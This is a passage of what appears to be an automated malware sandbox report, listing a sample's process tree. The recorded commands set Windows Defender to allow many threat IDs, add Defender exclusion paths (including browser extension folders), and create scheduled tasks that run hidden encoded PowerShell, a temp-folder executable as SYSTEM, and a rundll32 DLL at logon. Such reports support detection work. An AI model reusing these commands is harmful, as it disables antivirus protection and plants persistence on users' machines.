/reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                              2⤵
                                                                                PID:5072
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:2640
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                      4⤵
                                                                                        PID:1972
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                      3⤵
                                                                                        PID:1064
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                          PID:840
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:4156
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                            3⤵
                                                                                              PID:2528
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                              3⤵
                                                                                                PID:4976
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                3⤵
                                                                                                  PID:3196
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                  3⤵
                                                                                                    PID:3716
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                    3⤵
                                                                                                      PID:3780
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                      3⤵
                                                                                                        PID:4760
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                        3⤵
                                                                                                          PID:4460
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                          3⤵
                                                                                                            PID:4768
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                            3⤵
                                                                                                              PID:4036
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                              3⤵
                                                                                                                PID:1388
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:2328
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:5088
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:3480
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:2636
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:4092
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:3760
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:2988
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:3564
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:2528
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:4208
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:2604
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:4976
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:2828
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:1708
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MiKcmJhqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MiKcmJhqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PEKrPVrLutUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PEKrPVrLutUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WQqkELkVHOYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WQqkELkVHOYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mQvpiNUsNPjLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mQvpiNUsNPjLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UrkGLyjigLRybTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UrkGLyjigLRybTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YYFeagcQEOcPvCau\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YYFeagcQEOcPvCau\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                          2⤵
                                                                                                                                            PID:2096
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:4124
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4304
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3716
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4468
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4248
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4908
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:2444
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:1916
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4464
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:4116
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:552
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UrkGLyjigLRybTVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3308
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UrkGLyjigLRybTVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:2112
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:208
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:5080
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:1296
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3564
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4744
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3856
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YYFeagcQEOcPvCau /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4896
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YYFeagcQEOcPvCau /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3236
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "glinnPxdW" /SC once /ST 12:29:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:2768
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /run /I /tn "glinnPxdW"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:488
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /DELETE /F /TN "glinnPxdW"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:1748
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /CREATE /TN "OvvioKEypuBLsTFYZ" /SC once /ST 03:03:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\PPrAKDg.exe\" dM /nOsite_idsHk 385118 /S" /V1 /F
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:2532
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /run /I /tn "OvvioKEypuBLsTFYZ"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:452
                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4320 -ip 4320
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4524
                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1676 -ip 1676
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:3840
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:3024
                                                                                                                                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:3328
                                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:3324
                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:4012
                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:932
                                                                                                                                                                                                      • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:452
                                                                                                                                                                                                        • C:\Windows\windefender.exe
                                                                                                                                                                                                          C:\Windows\windefender.exe
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:692
                                                                                                                                                                                                          • C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\PPrAKDg.exe
                                                                                                                                                                                                            C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\PPrAKDg.exe dM /nOsite_idsHk 385118 /S
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:3420
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "bgKZxxDIOpRGITjYTe"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:2552
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:5080
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1648
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:4304
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:1148
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MiKcmJhqU\NNAGNZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tCfKGXDvAPRRvLf" /V1 /F
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:2760
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
